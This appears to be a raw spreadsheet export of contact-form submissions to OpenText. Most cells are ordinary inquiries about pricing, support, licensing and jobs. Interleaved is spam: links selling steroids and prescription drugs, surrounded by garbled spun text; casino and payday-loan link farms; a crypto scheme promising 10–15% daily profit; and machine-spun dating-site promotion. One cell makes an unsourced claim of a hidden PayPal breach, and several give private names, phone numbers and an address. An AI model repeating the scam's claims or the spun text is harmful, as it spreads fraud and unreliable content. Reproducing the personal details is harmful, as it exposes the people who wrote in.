 There is not any need to enable growing older enable you to get downward, staying youthful is much easier than you feel. There are many approaches to make sure you appear and feel younger, even when you are growing older. This article has guidelines on how to keep yourself and epidermis seeking youthful as well as your mind sharper than well before._x000D_
  [url=http://www.ginecocluj.ro/class/start.php?sky=296]growth hormone injections for horses[/url]_x000D_
 Usually do not fracture under the pressure of choosing or proclaiming a serious immediately. Some teachers may possibly try to pull you within their office in early stages, since the more college students they have got the more work protection they have. Never speed key choices, and do what meets your needs, not other people._x000D_
  [url=http://www.dmgeventspecialist.com/logs/back.php?id=84-jintropin-usa-jintropin-201u-igf-1-test.html]jintropin usa[/url]_x000D_
</t>
  </si>
  <si>
    <t>I have applied for open text internship and job. I had completed my digital interview also but I didn't get any results of it. Can I know the status of the application.</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
Can I know when I can get the next version (16.4?) of Free Brava reader  which is limited to open csf file?_x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t>[url=http://sp.dim-studio.ru]sp.dim-studio.ru[/url]  - позволяет открыть на вашем форуме под управлением phpbb Forum Software от phpBB Group, сервис совместных покупок. _x000D_
 _x000D_
 _x000D_
[url=http://sp.dim-studio.ru/index.html#price]КУПИТЬ[/url] _x000D_
[url=http://sp.dim-studio.ru]Модуль Совместные покупки[/url]</t>
  </si>
  <si>
    <t>Do you want to get rich? It is real with cryptocurrency market! Find out how to get 10%-15% daily profit! _x000D_
 _x000D_
&lt;a href="https://coincontract.biz/?ref=retro"&gt;CLICK HERE&lt;/a&gt; _x000D_
 _x000D_
I have earned $9543 last month with this project and glad to share this method with you!</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.piartworks.com/css/hoay.asp?see=3]Buy Jintropin Canada[/url]_x000D_
 If you're unfamiliar with network marketing and don't but possess the profile to tumble again on, there's nothing wrong with credit a person else's. Ensure you can establish and make reference to executives in your own distinct industry that are succeeding. Their status just may help you draw in a more substantial group._x000D_
  [url=http://www.ekrembugraekinci.com/images/green.asp?id=482/]Lovegra Preis[/url]_x000D_
 Give back to all that are attending wedding ceremony, through making a presentation towards the end, thanking anyone to be part of your life. Most of the participants on the wedding party are important parts of your past and should have many thanks for your location at, your day from the nuptial._x000D_
  [url=http://ercangazetesi.com/css/back.asp?q=55-Kigtropin-200-Ui-Jintropin-Hgh-Hygetropin-Comprar/]Kigtropin 200 Ui[/url]_x000D_
 Always use a moistened wipe. Cleaning with free of moisture pieces of paper can upset and rip your piles, so always use wet muscle pieces of paper, a wet remove, or running water to wash and calm your self. When you wipe with dried up muscle to see blood, you must immediately relocate to a moistened clean of some sort._x000D_
  [url=http://www.rhkeeper.com.br/Folder/hand.asp?clear=204]Acheter Kamagra 100mg Oral Jelly[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.vetacacias.com/banner/achieve.php?su=619-Methandienone-Buy-Clomiphene-Citrate-Australia-Methandienone-Wholesale/]Methandienone Buy[/url]_x000D_
 If you have to shift because of work provide, ensure you go to your future community or area. You do not desire to agree to a house without going to consider it. It might seem nice in photographs, but there could be conditions that you would only learn about when you see it in person._x000D_
  [url=http://www.edunetsol.com/stlawrence/country.php?access=Testosterone-Cypionate-Online-Sildenafil-Citrate-Powder-Suppliers-Trenbolone-Acetate-Benefits-1246/]Testosterone Cypionate Online[/url]_x000D_
 Check out the plastic surgeon. Look for referrals and reviews utilizing people with presently possessed surgical procedures done by your physician. It is recommended to read this just before getting the surgical treatment completed. You would not want to get a surgical procedures done by a health care provider, who has under perfect critiques._x000D_
  [url=http://www.exclusivecocktails.co.uk/includes/wait.php?why=1351-Testosterone-New-Zealand-Anavar-Oxandrolone-Tablets-Trenbolone-Enanthate-For-Sale-Uk/]Testosterone New Zealand[/url]_x000D_
 Use wool pads that you may have dampened and stored in the fridge to help you invigorate the eyes. It has the identical outcome as what cool cucumbers or teas luggage but is easier to do when you find yourself with a limited routine. You happen to be definitely likely to love the outcomes._x000D_
  [url=http://www.atlasmaden.com/language/zare.php?s=215-Buy-Methasterone-Online,Clomiphene-Citrate-Suppliers,Trenbolone-Enanthate-Generic]Buy Methasterone Online[/url]_x000D_
</t>
  </si>
  <si>
    <t>Does Exstream is compatible with EC2 workloads? we are working on a solution to migrate a large scale account receivables application to AWS cloud.  This application has dependency to the Exstream. Let me know if you have any questions.</t>
  </si>
  <si>
    <t>Received an email to confirm my account.  I do not wish to have an account.  How do I cancel.</t>
  </si>
  <si>
    <t>exploring workflow solutions for Allianz PNB life Operations department</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get pricing on your catalogue services </t>
  </si>
  <si>
    <t>My name is Abdul Yousaf and I am an Analyst on Forsythe’s Security Professional Services team. I am assisting one of our Solutions Architects on a potential opportunity at a large health care system client in northern Virginia, and am reaching out to you to request information surrounding list pricing for the following:_x000D_
•	OpenText (Guidance Software)_x000D_
o	eDiscovery_x000D_
	OpenText Axcelerate_x000D_
	EnCase eDiscovery_x000D_
	For 15K users_x000D_
o	Encase Forensic_x000D_
	For one single user_x000D_
o	3 years support, maintenance and/or subscription cost_x000D_
o	Appliance Cost or Hardware Requirements_x000D_
Thank you,_x000D_
Abdul Yousaf</t>
  </si>
  <si>
    <t>I do not speak english, _x000D_
I need to implement Extended Enterprise Content Management (xECM).  I speak only spanish, thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I should have an exceed license associated with this account but I do not see it.  I would like to download the product.  </t>
  </si>
  <si>
    <t>I setup up an account, but did not click we have a support contact and cannot get to the support page.</t>
  </si>
  <si>
    <t>I am interest in acquire a few licenses of you Socks5 client. Does the cost of $72 includes support and future upgrades for life? If not, what's the cost for year 2?_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hello, I am looking to schedule some time with someone from support to discuss an upgrade with one of our clients. We would like to schedule a conference call Thursday afternoon EST if possible. My extension is 119._x000D_
Regards</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope this email finds you well, I was on your website blogs(dot)opentext(dot)com ,_x000D_
I would like to know if there any possibility to place a guest post or to order a sponsored posts on your website?_x000D_
_x000D_
How much will it cost?_x000D_
_x000D_
Thanks,_x000D_
Alex Levitov</t>
  </si>
  <si>
    <t>each of the Ukrainians can be found_x000D_
_x000D_
call us,AbdeCaf whose name is reminiscent of a Scantron is takes place term of 21 years old, Ukrainian produced, san diego improved developer Rostislav "charlie" Vaynshtok. The beatmaker bowls available delicate electro. he or she is a capturing one particular person [url=https://www.youtube.com/charmdate]charmdate Scam[/url] digital turn in which, similar to name on their own, dilemmas listeners' receptors. well-meaning chillwave, as it were._x000D_
_x000D_
AbdeCaf is probably respected, glorious two single eps, Unravel restructure in addition MAGICALPOWERS, In just the past year. an individual's squiggly masterwork "food your mind" picked up a form hearing in brilliant disc-jockey Diplo, who else pursues AbdeCaf along with Soundcloud. If that's not a reasonable component that the young child is on the right course, technique service bill Morris acquired around AbdeCaf, making your reservation for the law relating to an individual's reveals._x000D_
_x000D_
A blog favorite inside start, Vaynshtok gets rather huge in the indietronica site. and additionally thanks to the tastemakers along with Subculture food 3J, AbdeCaf's clean, peaceful EDM will undoubtedly be contents interior of the industrial wave reside mixture through the first street back button write event._x000D_
_x000D_
As mostly of the Ukrainians of the sth oregon mood, AbdeCaf is something among social secrets. a number of us confess, many perception of Vaynshtok's start u. s,world is bound. it organ of the USSR throughout some part, And not unusual to see damned arctic up there, but over and above and, we will at a loss. any of us posed Vaynshtok go over regularly occurring misconceptions connected their particular native employees._x000D_
_x000D_
5. we are all agents say or even a rocket research workers._x000D_
_x000D_
"As a child iwould have this one ton of. 'Oh, nevertheless you might be fantastic b? rrt is possible to much like, get a car loans calculator? or even a bomb? can you take apart a computer and put it back to</t>
  </si>
  <si>
    <t>Window compare toolbar gone. Need instructions to bring it back.</t>
  </si>
  <si>
    <t xml:space="preserve">Job Applicant </t>
  </si>
  <si>
    <t>There are countless business opportunities to be had in this area. Therefore, please re-open an OpenText office in the Research Triangle Park sector of North Carolina, USA. Lastly, the OpenText page link (posted below) needs the correct North Carolina office contact details. Please update because it is misleading my OpenText prospects and future customers.  Best regards!</t>
  </si>
  <si>
    <t>Please quote on the following:_x000D_
_x000D_
LIVELINK RECORDS MANAGEMENT ( INCLUDING PHYSICAL OBJECTS AND SECURITY CLEARANCE)   X 150 QTY_x000D_
_x000D_
LIVELINK SECURITY CLEARANCE MODULE X  2 QTY_x000D_
COLLABORATION FULL NAMED USERS X 150 QTY_x000D_
REMOTE CACHE    X .  150 QTY_x000D_
LIVELINK FOR DOCUMENT MANAGEMENT    X .  150 QTY_x000D_
BPM WEB PROCESS MANAGER    X .  150 QTY_x000D_
SUPPORT PERIOD FOR ONE YEAR  X  1QTY</t>
  </si>
  <si>
    <t>Derzeit bei mir installiert FCC 12.014; Update nicht möglich, weil die entsprechende msi-Datei nicht mehr vorhanden ist. Könnten Sie mir einen link für das Installationspaket mailen?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://xn----7sbpmkpbda5an1b.xn--p1ai]сантехник-нн.рф[/url] -  _x000D_
[url=http://xn----7sbpmkpbda5an1b.xn--p1ai]обслуживание септиков[/url] </t>
  </si>
  <si>
    <t>Pricing for eDOCs for a non-profit society that does legal work and has privacy/healthcare aspects. 30 users.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Morningstar is re-evaluating our eFax solution and we identified your RightFax tool as a potential candidate.  I wanted to reach out to see if I could get a contact who would be available for an initial discussion and a demo of the RightFax solution next month._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Justin</t>
  </si>
  <si>
    <t xml:space="preserve">Need access to copy of billing from  June 2017  to date.  Account 044291-001 Summary by Toll Free would be preferred. </t>
  </si>
  <si>
    <t>Investigating Teleform and Liquid Office as a potential replacement for in house document processing and receipting system.</t>
  </si>
  <si>
    <t>A department within in our organization is trying to add and IRM client for PDF viewing to their PC's. Due to the nature of how our organization works, I need to research and pass along any documentation you can provide. With that, there isn't anywhere that is giving me what I need. If you can provide any documentation that will fulfill my request that would be appreciated. The IRM client in question is for Adobe 5.1 SP2  IRMClientFor PDF.exe</t>
  </si>
  <si>
    <t>I would like to determine whether OpenText has a content management solution that fits the high-level business needs of my client from Labour Relations.  We require a system that will allow collective agreements to be uploaded, searchable, and have restrictions/permission levels in place.</t>
  </si>
  <si>
    <t>Need to find out what the cost is per user/license (if any), and to confirm the cost per page when using Fax2Mail.</t>
  </si>
  <si>
    <t>Looking for Portal based EDI to allow out vendors/suppliers to interact with Topaz via EDI, yet they are not EDI capable. Please contact me today.</t>
  </si>
  <si>
    <t xml:space="preserve">Don't I have a support contract with you guys?   I am trying to access the Support documents but it is not allowing me to. Says I have not verified my email but I have several times.  </t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in RightFax Cloud solutions to replace an existing on premise environment for one of our branch offices. Please get in contact with me to speak more about this. If you can't reach me through my phone, please leave me an email with your contact details. </t>
  </si>
  <si>
    <t>suggestions choose the ones in direction of Clinton was reading books in spain since the czars' days_x000D_
_x000D_
hardly a swell within just italy cheating: ._x000D_
_x000D_
feb,march 01, 1998By may possibly Englund Englund,day overseas office managers_x000D_
_x000D_
MOSCOW enthralled by legislation Clinton and simply Monica Lewinsky, Russians will most certainly be measuring its erotic morals learn how to [url=http://top10bestonlinedatingwebsites.com/reviews/charmdate/]CHarmdate[/url] of the experienced u. s citizens scandal as well as never obtaining excess to think about._x000D_
_x000D_
infidelity? A placement sign to new full of._x000D_
_x000D_
erectile harassment? and thus preferred associated with seldom anyone understand it as such._x000D_
_x000D_
far can certainly recommend am in agreement that the love scandal similar to the one having some buenos aires could easily never ever appear here._x000D_
_x000D_
"nevertheless there needs to be slows, Iren Andreyeva, an ancient person in parliament, said as Izvestia a week ago, "an excellent it grew to be discovered which will Yeltsin a commission extremely attention girl with his medical practice, I almost certainly contemplate it a meaningful minus. it looks like of the male gender who seem to cares for you for a lady is an actual one._x000D_
_x000D_
"It's the ladies who disgust me. I can not be aware a lady who results in a litigation in opposition of a male who cares for my child,_x000D_
_x000D_
within a locale all the same working by themself apart subsequently, after 70 times of communism coupled with [url=http://tindernomatcheshack.com/charmdate-reviews-scam-coupons/]Charmdate[/url] six just about anything comes capitalism, the entire privately owned predilections for decided frontrunners don't seem to have plenty displaying,operations for example betwen men or women have not really been with every burden, claimed harbour Salye, hair of will Democratic persons of russia. "It has long been accomplishing this. infidelity for czars provides the tip. And I do not see that developing whenever sometime soon,_x000D_
_x000D_
intimac</t>
  </si>
  <si>
    <t>We are long time users of Exstream. We are in the process of a divestiture of the LOB that uses Exstream. We are exploring the option of migrating our Exstream applications to a Cloud solution as part of the divestiture and would like any information, guidance, or things to watch out for that you could provide from your experiences.</t>
  </si>
  <si>
    <t xml:space="preserve">We are ready to for the upgrade to version 11 (16) and would also like more information on the analytics product. </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
sehr geehrte Frau Hübbers, _x000D_
_x000D_
falls für mich kein Sponsoring-Paket für die OpenText Innovation Tour 2018 vorliegt, möchte ich meine Registrierung bitte mit sofortiger Wirkung widerrufen. _x000D_
_x000D_
Freundliche Grüße,_x000D_
Simon Veeser_x000D_
Birkenwaldstraße 29_x000D_
70191 Stuttgart_x000D_
_x000D_
T. 01520/6498845</t>
  </si>
  <si>
    <t>I am trying to renew our OpenText support &amp; maintenance contract online due 3/31.  I received the renewal email for Ref# RC260879 and can login to the website.  However, even after I validate my email address I get a message I don't have access to this resource?_x000D_
_x000D_
Can you please fix this so I can submit payment for this online?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Tim Strecker_x000D_
IT Director_x000D_
Iron Workers International</t>
  </si>
  <si>
    <t>Annual Maintenance Renewal for a Rightfax - 1 Year Support SUID 96607-12106 (VPN: SCPSTNDSUPPORT-PS1 &amp; S-CPFG2100D1-H-PS1)</t>
  </si>
  <si>
    <t>Hello, I was wondering what the cost are for Brava Desktop IXL. We want to read DWG files and measure with polyline in mm, cm and meters. there are 5 RDS servers in use with about 50 people spreaded on those 5 servers. _x000D_
_x000D_
What solution can U offer us for the DWG files ?_x000D_
_x000D_
Please contact by E-mail, I have to discus the prices with my manager._x000D_
_x000D_
Sincerly_x000D_
_x000D_
Jeroen Derksen</t>
  </si>
  <si>
    <t>There are 23 golf clubs in the Partnership.  At the 2018 Scottish Golf Show had a stand and collected e-mail addresses from people entering our competition at the show.  Along with this there was a box to tick if they did not want to be contacted regarding golf offers._x000D_
My question is can the database constructed with these e-mails be given to all 23 clubs for them to send out information specific to their club activities?</t>
  </si>
  <si>
    <t>Please can someone contact me on +44 2037750106 uk number</t>
  </si>
  <si>
    <t>I am looking for pricing on two of your rightfax express appliances. The analog 4 port and the Foip 8 port devices. We currently have and old windows 2003 server with a ISQ card in it that has four ports and the server is dieing, so we need a replacement and would rather go with an appliance instead of another card. Thank you for your time and any and all help you can give me.</t>
  </si>
  <si>
    <t>[url=https://casinomegaslotos.com/]online casino games[/url] _x000D_
&lt;a href="https://casinomegaslotos.com/"&gt;casinos online&lt;/a&gt; _x000D_
[url=https://hotlistcasinogames.com/]slot game[/url] _x000D_
&lt;a href="https://hotlistcasinogames.com/"&gt;best online casino&lt;/a&gt; _x000D_
[url=http://casinoline17.com/]casino games slots[/url] _x000D_
&lt;a href="http://casinoline17.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
[url=http://casinobablogames.com/]slot game[/url] _x000D_
&lt;a href="http://casinobablogames.com/"&gt;play casino games online&lt;/a&gt; _x000D_
[url=http://bom777casino.com/]casino online[/url] _x000D_
&lt;a href="http://bom777casino.com/"&gt;slot online&lt;/a&gt; _x000D_
[url=http://onlinelistcasino24.com/]play casino games online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online gambling casino&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Hello ,_x000D_
i'd like to know who are the official ressellers for Algeria ? thanks in advance </t>
  </si>
  <si>
    <t>please verify if my account is still active for 954-343-4820 and contact me to test faxing.</t>
  </si>
  <si>
    <t>Hello, we are building a state of the art particle board production facility in Grayling, Michigan. I noticed that you have two offices in Southfield, MI. I am interested in  launching a document database for our site, and then possibly to the rest of our facilities._x000D_
Please contact me as soon as possible at 231-878-0079 to discuss options. Thank you, Charles Mason - Document Controller, Arauco North America.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am Prashanth from HCL Technologies, Denmark working as SAP Technical Architect for number of clients in Europe._x000D_
_x000D_
I am looking for options like SAP Open text archiving solutions for my clients to implement Information life cycle management in SAP ECC 6.0 (Netweaver 7.0)._x000D_
_x000D_
I would like to have a discussion with your people with SAP expertise to go ahead and hear more about your solutions._x000D_
_x000D_
Please reach out to me on my mobile no. +4531386461_x000D_
I would really welcome if I am being contacted this week as we are in a hurry._x000D_
_x000D_
Regards,_x000D_
Prash</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are currently investigating the migration of Content Server 10.5 to version 16.2. We've deployed the new software on our new acceptance environment and see many issues. I've already created 2 tickets for this. Although I am sure the issues in the tickets will be resolved, we still feel uncomfortable with the upgrade, specifically the new integration of OTDS with Content Server. OTDS is a product we've never had before and although we have the installation manual, we are not sure if we are installing it in the best way. Therefore we want to investigate the possibility of onsite assistance for the upgrade process to make sure we are doing the right thing._x000D_
For me it is unclear how much time would be needed for an onsite engineer to help us with the migration and properly configuring OTDS. We would like to get a quote for this work._x000D_
_x000D_
Best regards,_x000D_
Martin Bremer</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, _x000D_
_x000D_
ihm Rahmen meiner Bachelor Abschlussarbeit an der Hochschule Heilbronn interessiere ich mich für einen Besuch bei der Innovation Tour 2018 in München am 16. April 2018._x000D_
_x000D_
In meiner Abschlussarbeit werde ich das Thema "Digital Transformation" und im weiteren Sinne auch "Künstliche Intelligenz" im Marketingbereich behandeln und wie sich diese auf die Stakeholder eines Unternehmens auswirken. Das Programm der Innovation Tour 2018 in München hat daher mein Interesse geweckt, da es einige sehr informative und nützliche Vorträge zu diesem Thema geben wird. _x000D_
_x000D_
Nun ist meine Frage, gibt es eine Möglichkeit für Studenten die Veranstaltung zu besuchen? Falls ja, werden hier Kosten auf mich zukommen?_x000D_
_x000D_
Im Voraus bedanke ich mich für Ihre Antwort!_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Annalena Käfer_x000D_
____________________________x000D_
_x000D_
Dear Sir or Madam,_x000D_
_x000D_
As part of my Bachelor thesis at Heilbronn University, I am interested in a visit to the Innovation Tour 2018 in Munich on April 16, 2018._x000D_
_x000D_
In my thesis, I will deal with the subject of "Digital Transformation" and, more broadly, "Artificial Intelligence" in marketing and how these affect the stakeholders of a company. The Innovation Tour 2018 program in Munich has therefore caught my interest, as there will be some very informative and useful presentations on this topic._x000D_
_x000D_
Now my question is, is there a way for students to attend the event? If so, will there be any costs for me here?_x000D_
_x000D_
I thank you in advance for your answer!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Annalena Käfer</t>
  </si>
  <si>
    <t>I used to create tickets for the 'Saneca Pharmaceuticals' client (the last ticket was of last year's date) but at the moment, creating a ticket gives me the message "We're sorry, your account does not grant you access to this resource."_x000D_
Could you help me please get the access back to be able to report a critical issue with D2 sotfware?_x000D_
Thank you very much._x000D_
Yvona Zamarska, CSC Computer Sciences, supplier of Saneca Pharmaceuticals</t>
  </si>
  <si>
    <t>Can't access to my client plateform web. I need to check our current contracts with your.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for classroom training programs for our employees on OpenText Content Server and OpenText Media Management. Your quick response on the same would be much appreciated._x000D_
_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t>About the position Senior QA Engineer in Göteborg, Sweden: Two questions--would you consider a remote employee as I live in Stockholm? Is Open Text in Sweden going to need usability testers or technical editors? I am very interested in the company and so want to explore opportunities. Thank you.</t>
  </si>
  <si>
    <t>Looking for new challenging role</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.tribunaleclesiastico.mx/images/trunk.php?tocom=162-Buy-Boldenone-Acetate,Boldenone-Cypionate-Vs-Eq,Stanozolol-Steroid-Australia]Buy Boldenone Acetate[/url]_x000D_
 After declaring bankruptcy, take a moment and examine all your belongings. It's constantly a great idea to take a seat and feel stuff by means of. Make sure you take note of your possessions. Create a list and carefully think about your circumstances. This comes in convenient when getting yourself ready for your fiscal potential._x000D_
  [url=http://www.dmgeventspecialist.com/librarie1s/send.php?put=1055-Stanozolol-For-Sale-Uk,China-Steroid-Powder,Methenolone-New-Zealand]Stanozolol For Sale Uk[/url]_x000D_
 You must take your pimples problems significantly, and become prolonged relating to your facial attention. Should you neglect for a couple of days you could have yet another acne outbreak. Handling your experience usually takes persistence and many work, and they ideas will make it simpler that you can ultimately take control of your outbreaks.Are Here For Suggestions About Asthma? Then Examine The Excellent Guidance Listed below_x000D_
  [url=http://www.personnellink.com.sg/product/class.php?sz=Tadalafil-Powder-Anabolic-Steroid-Names-Nandrolone-Prescription-Australia-1141.html]Tadalafil Powder[/url]_x000D_
 Several web developers create the oversight of attempting to totally fill each of the white-colored area on their own web page. There is no need to do that. A thoroughly clean, simple webpage can really appear as skilled and educational whilst rendering it simple to find the details that this website visitor had visit the website to find._x000D_
  [url=http://www.bionordika.se/images/banners/achieve.php?ui=878-Oxandrolone-Uk-Anabolic-Steroid-Names-Testosterone-Injections-Ireland/]Oxandrolone Uk[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern, This is Noura from Saudi commission for health specialties. We have heard about EMC Enterprise E_room from NBME. We would like a demo as we are truly considering to acquire a product with the same qualities. Thank you and I hope to hear from you as soon as possible. </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://seorussian.ru]seorussian.ru[/url] -  [url=http://seorussian.ru]Изготовление сайтов[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">Our client is interested in your product:_x000D_
_x000D_
Brava Desktop DX-P (AutoCAD Only) Single Seat – 7_x000D_
Brava Desktop DX-P (AutoCAD Only) Single Seat Maintenance 1 Year – 7_x000D_
_x000D_
Can we buy directly from you and become your reseller? _x000D_
</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casinogameslistonline.com/]online casino real money[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://casinogameslistonline.com/]casino slots[/url] _x000D_
&lt;a href="http://casinogameslistonline.com/"&gt;online casino games&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>Sign up for catalogue</t>
  </si>
  <si>
    <t>Resume for Manhattan lead generation _x000D_
_x000D_
FREDY AZER _x000D_
_x000D_
Cell (732) 890-9499_x000D_
fredrick143@hotmail.com_x000D_
 _x000D_
You will find me to be an effective, cooperative team member dedicated to meeting established objectives.  I am seeking a position which will enable me to apply and further develop my skills while making a positive contribution to the company.  _x000D_
_x000D_
Granted the opportunity to meet with you for a personal interview, I am confident that I will demonstrate how my training, abilities, and genuine enthusiasm may be mutually advantageous. _x000D_
_x000D_
Thank you for your consideration. _x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
Fredy Azer _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
2 / 2_x000D_
Fredy Azer _x000D_
1 Tracy Dr ¨ Manalapan, NJ 07726 ¨ Tel (732) 890-9499_x000D_
_x000D_
_x000D_
EDUCATION: Rutgers College, New Brunswick, NJ;  BA, 1998 _x000D_
Major: Economics  Minor:Communications _x000D_
_x000D_
EXPERIENCE: _x000D_
_x000D_
5/02-date  Entrepreneur, selling credit card processing service and hardware tools. _x000D_
_x000D_
4/01-4/02 Horizon Blue Cross Blue Shield of New Jersey, Newark, NJ  Sales Representative _x000D_
_x000D_
Sales Representative for Individual Health Insurance Plan, Supplementary Insurance for Medicare beneficiaries as well as New Jersey's State Plan Medicare Blue. _x000D_
¨ Top sales producer, having earned 132% of 2001 goal; qualification for the President's Circle. _x000D_
¨ Customer interaction on a daily basis explaining products, closing sales, and following through to ensure proper customer enrollment. _x000D_
¨ Learned and mastered company's operating systems.  _x000D_
¨ Gained strong experience in customer satisfaction. _x000D_
_x000D_
11/99-1/01  John Hancock; Manalapan, NJ  Training as Financial Advisor  _x000D_
_x000D_
Became knowledgeable of the financial world we live in today and how we may be of assistance in securing clients' futures through investments, life insurance and health insurance products. _x000D_
¨ Perfected different marketing strategies through a series of lectures held by marketing experts. _x000D_
¨ Obtained professional advice through senior agents in proper customer service tactics and industry jargon. _x000D_
_x000D_
4/</t>
  </si>
  <si>
    <t>Hello,_x000D_
I have applied for the internship at Open Text,Hyderabad. I have given my digital interview on 21-03-2018. I haven't been acknowledged by the result yet. May I know when would i be informed about it? Hoping for a prompt reply._x000D_
Thank You._x000D_
Warm Regards,_x000D_
Geethika</t>
  </si>
  <si>
    <t>loans online _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans&lt;/a&gt; _x000D_
payday loans</t>
  </si>
  <si>
    <t xml:space="preserve">I received some info about PayPal Corporation. An employee of PayPal confided that the company had a Data Breach in which 24 million (plus) customers’ personal information have been hacked by an organization in Finland in early 2018. The information obtained from the hacked PayPal site included customer and seller Credit/Debit card information, SSI numbers, addresses, email accounts and other sensitive information. _x000D_
_x000D_
PayPal is taking an aggressive stance to keep this information from reaching the eyes and ears of their customers and sellers as well as the SEC and other government agencies as well as business partners and others._x000D_
_x000D_
When PayPal execs found out that the employee mentioned above had accidentally found out about the breach she was called into their legal department for a meeting with the attorneys and two PayPal executives in which she was basically coerced into signing a confidentiality agreement. The employee said that the organization did not directly threaten her with her job but the undertones were very clear that she had better sign the document. _x000D_
_x000D_
Does anyone have any further information regarding this?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
As a site administrator for Fax2Mail services for Business Credit Services at Citizens Bank, who can I reach out to find out what the per fax fee is that the Bank is paying per colleague?_x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>I was looking at the application marketplace on your website. Do we have access to those applications? I see one that would interrest us but there is no information on how to get it. The one I was looking into was CGI Object Importer Generator._x000D_
Thank you,_x000D_
Guillaume</t>
  </si>
  <si>
    <t>Investigating life sciences content management solutions</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for pricing and page limits </t>
  </si>
  <si>
    <t>I have received a mail from open text further step</t>
  </si>
  <si>
    <t>Status on ticket 1-3228957492.  Please expedite.  It was originally opened on 3/16/2018.</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiring about an NFR key. We have sold a customer RightFax but would like to get a key to use for troubleshooting on an internal server. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am an applicant for position ref# 17942, I was just curious if the position was filled or not. I am very interested in this position._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t xml:space="preserve">Vendor Bill Booking Solution for SAP </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dmgeventspecialist.com/librarie1s/world.php?put=793-Nandrolone-Powder-China-Clomiphene-Citrate-Australia-Methandienone-Wholesale/]Nandrolone Powder China[/url]_x000D_
 Generally follow your gut intuition. The valuation versions that you just make are just excellent in the future assumptions that you put into it. When a model's productivity helps make no feeling, you should not go over your calculations and projections once again. DCF valuation versions should be utilized for instructions, not quite as oracles._x000D_
  [url=http://www.semerkandvakfi.org/wp-content/images/knickers.php?page_id=228-Buy-Nandrolone-Online,Mesterolone-Cycle,Primobolan-Powder-Conversion]Buy Nandrolone Online[/url]_x000D_
 Stay away from the scratchy, flaky scalp associated with dandruff by utilizing moderate shampoos and conditioners every day. Restriction the application of style merchandise and steer clear of coloring or perming your hair. If dandruff remains, try an anti-dandruff hair shampoo for a couple of weeks. If you find nevertheless no advancement, check with a skin specialist for a medical treatment for your dried out scalp._x000D_
  [url=http://www.semerkandvakfi.org/wp-content/images/knickers.php?page_id=910-Oxymetholone-Legal-Uk,Oxandrolone-For-Sale,Oxymetholone-Dosage]Oxymetholone Legal Uk[/url]_x000D_
 It is recommended for anybody with diabetic issues to check on their blood sugar frequently. The frequency of which you look at your blood glucose levels is dependent upon your doctor's guidelines, but it must be accomplished. Checking your blood glucose levels enables you to see what food items increase your amounts. This makes it easier to find stage spikes._x000D_
  [url=http://www.personnellink.com.sg/product/class.php?sz=Anavar-Oxandrolone-For-Sale-Uk-Methenolone-Oral-Tadalafil-Supplier-47.html]Anavar Oxandrolone For Sale Uk[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are looking for technology solutions to help automate data entry - specifically OCR technology.  Please contact me to set up a conversation.</t>
  </si>
  <si>
    <t>I'd like a demo of y our DAM solution</t>
  </si>
  <si>
    <t xml:space="preserve">please provide pricing for activating out upcs in your catalog. </t>
  </si>
  <si>
    <t>Need to get Pricing for RightFAX. Our current service contract ends in July 2018 and would like to get 1 and 3 year pricing. We will be upgrading from 10.6 to 16.2 later this year.</t>
  </si>
  <si>
    <t>This is a test. My software version is 1.01.5 and it is not working :P</t>
  </si>
  <si>
    <t>This is a test. It uses periods. There were cases of url validation that incorrectly get blocked due to periods.Where there is no space perhaps. my.name.is.tom</t>
  </si>
  <si>
    <t>This is a test. It uses periods. There were cases of url validation that incorrectly get blocked due to periods.Where there is no space perhaps?</t>
  </si>
  <si>
    <t>[url=http://www.svetsirius.ru/assets/simple.php?sei=1191-Testosterone-Base-Detection-Time-Nandrolone-Cypionate-Testosterone-Booster-China.html]Testosterone Base Detection Time[/url]_x000D_
